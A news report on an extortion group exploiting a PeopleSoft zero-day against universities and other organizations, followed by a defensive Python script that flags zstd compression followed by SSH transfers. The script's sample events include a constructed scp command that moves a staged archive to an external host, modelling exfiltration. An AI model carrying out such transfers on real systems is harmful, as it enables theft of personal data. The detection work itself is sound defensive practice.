Critical PeopleSoft zero-day fuels extortion campaign against roughly 100 organizations
ShinyHunters, one of the world’s most prolific data theft and extortion groups, exploited a zero-day vulnerability in Oracle’s PeopleSoft suite to compromise organizations worldwide, stealing gigabytes of data and demanding payment to keep it private, according to Ars Technica and Google's Mandiant.
The flaw, tracked as CVE-2026-35273, carries a near-maximum severity rating of 9.8 and allows unauthenticated attackers to compromise PeopleSoft PeopleTools versions 8.61 and 8.62 over HTTP, according to Oracle's security alert. Mandiant reported that exploitation began 27 May 2026—two weeks before Oracle published its out-of-band advisory. Oracle has issued a stopgap mitigation but has not yet fully patched the flaw.
As of Wednesday, attackers had targeted roughly 300 endpoints belonging to about 100 organizations, 68 percent of them in higher education, Mandiant said. The University of Nottingham confirmed that a “significant” amount of student data was compromised after ShinyHunters published gigabytes of data it claimed to have stolen. Analysis of a script left on the group’s staging server shows the attackers mapped PeopleSoft and WebLogic configurations, compressed stolen data with the zstd tool, and exfiltrated it over SSH to their data leak site, which claimed 48GB from a single victim.
Active since at least 2019, ShinyHunters has breached Ticketmaster (through Snowflake), Santander (Spain's largest bank), and Salesforce and, through it, Google. The group gains access via software exploits, cloud misconfigurations, stolen OAuth tokens, supply chain attacks, and voice phishing.
PeopleSoft remains widely deployed across government and university HR, payroll, and financial systems.
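For defenders, the staging behaviour reported above (zstd compression followed by transfer over SSH) can be hunted in process-execution telemetry from PeopleSoft and WebLogic hosts. The following is an added example, not code from the article, Oracle or Mandiant; the event field names, host names, addresses and the 30-minute window are assumptions, and the sample events are constructed.

```python
import json
from datetime import datetime, timedelta

# Constructed process-execution events (hypothetical field names, such as an
# EDR or auditd pipeline might emit). None of this data is from the incident.
SAMPLE_EVENTS = """
{"ts": "2026-06-01T02:10:00", "host": "psapp01", "user": "psoft", "exe": "/usr/bin/zstd", "argv": ["zstd", "-T0", "/tmp/stage.tar"]}
{"ts": "2026-06-01T02:14:30", "host": "psapp01", "user": "psoft", "exe": "/usr/bin/scp", "argv": ["scp", "/tmp/stage.tar.zst", "user@192.0.2.10:/in/"]}
{"ts": "2026-06-01T03:00:00", "host": "psapp02", "user": "backup", "exe": "/usr/bin/zstd", "argv": ["zstd", "/var/backup/db.dump"]}
{"ts": "2026-06-01T09:00:00", "host": "psapp02", "user": "backup", "exe": "/usr/bin/ssh", "argv": ["ssh", "backup@198.51.100.5"]}
{"ts": "2026-06-01T04:00:00", "host": "psapp03", "user": "admin", "exe": "/usr/bin/ssh", "argv": ["ssh", "admin@203.0.113.7"]}
"""

COMPRESSORS = {"zstd"}
SSH_CLIENTS = {"ssh", "scp", "sftp"}


def find_compress_then_ssh(lines, window=timedelta(minutes=30)):
    """Flag SSH-family clients started by the same user on the same host
    within `window` after a zstd run. Returns a list of
    (host, user, zstd_time, ssh_time, ssh_argv) tuples."""
    events = [json.loads(line) for line in lines.splitlines() if line.strip()]
    for event in events:
        event["t"] = datetime.fromisoformat(event["ts"])
    events.sort(key=lambda event: event["t"])  # logs may arrive out of order

    last_zstd = {}  # (host, user) -> time of most recent zstd execution
    findings = []
    for event in events:
        name = event["exe"].rsplit("/", 1)[-1]
        key = (event["host"], event["user"])
        if name in COMPRESSORS:
            last_zstd[key] = event["t"]
        elif name in SSH_CLIENTS and key in last_zstd:
            if event["t"] - last_zstd[key] <= window:
                findings.append((event["host"], event["user"],
                                 last_zstd[key], event["t"], event["argv"]))
    return findings


if __name__ == "__main__":
    for host, user, z_time, s_time, argv in find_compress_then_ssh(SAMPLE_EVENTS):
        print(f"{host} {user}: zstd at {z_time}, then '{' '.join(argv)}' at {s_time}")
```

Legitimate backup jobs that compress and then copy off-host will also match, so findings should be compared against known scheduled jobs and approved destinations before escalation.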